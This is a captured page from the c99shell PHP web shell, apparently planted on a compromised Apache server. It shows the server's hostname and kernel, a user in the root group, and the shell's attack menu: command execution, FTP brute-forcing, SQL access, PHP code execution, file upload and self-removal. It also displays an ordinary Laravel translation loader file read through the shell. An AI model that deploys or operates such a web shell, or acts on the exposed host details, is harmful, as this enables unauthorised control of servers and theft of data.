!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/packages/joedixon/laravel-translation/src/   drwxr-xr-x
Free 29.25 GB of 117.98 GB (24.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     InterfaceDatabaseLoader.php (1.74 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace JoeDixon\Translation;

use 
Illuminate\Translation\LoaderInterface;
use 
JoeDixon\Translation\Drivers\Translation;

class 
InterfaceDatabaseLoader implements LoaderInterface
{
    private 
$translation;

    public function 
__construct(Translation $translation)
    {
        
$this->translation $translation;
    }

    
/**
     * Load the messages for the given locale.
     *
     * @param  string  $locale
     * @param  string  $group
     * @param  string  $namespace
     * @return array
     */
    
public function load($locale$group$namespace null)
    {
        if (
$group == '*' && $namespace == '*') {
            return 
$this->translation->getSingleTranslationsFor($locale)->get('single'collect())->toArray();
        }

        if (
is_null($namespace) || $namespace == '*') {
            return 
$this->translation->getGroupTranslationsFor($locale)->filter(function ($value$key) use ($group) {
                return 
$key === $group;
            })->
first();
        }

        return 
$this->translation->getGroupTranslationsFor($locale)->filter(function ($value$key) use ($group$namespace) {
            return 
$key === "{$namespace}::{$group}";
        })->
first();
    }

    
/**
     * Add a new namespace to the loader.
     *
     * @param  string  $namespace
     * @param  string  $hint
     * @return void
     */
    
public function addNamespace($namespace$hint)
    {
        
//
    
}

    
/**
     * Add a new JSON path to the loader.
     *
     * @param  string  $path
     * @return void
     */
    
public function addJsonPath($path)
    {
        
//
    
}

    
/**
     * Get an array of all the registered namespaces.
     *
     * @return array
     */
    
public function namespaces()
    {
        return [];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--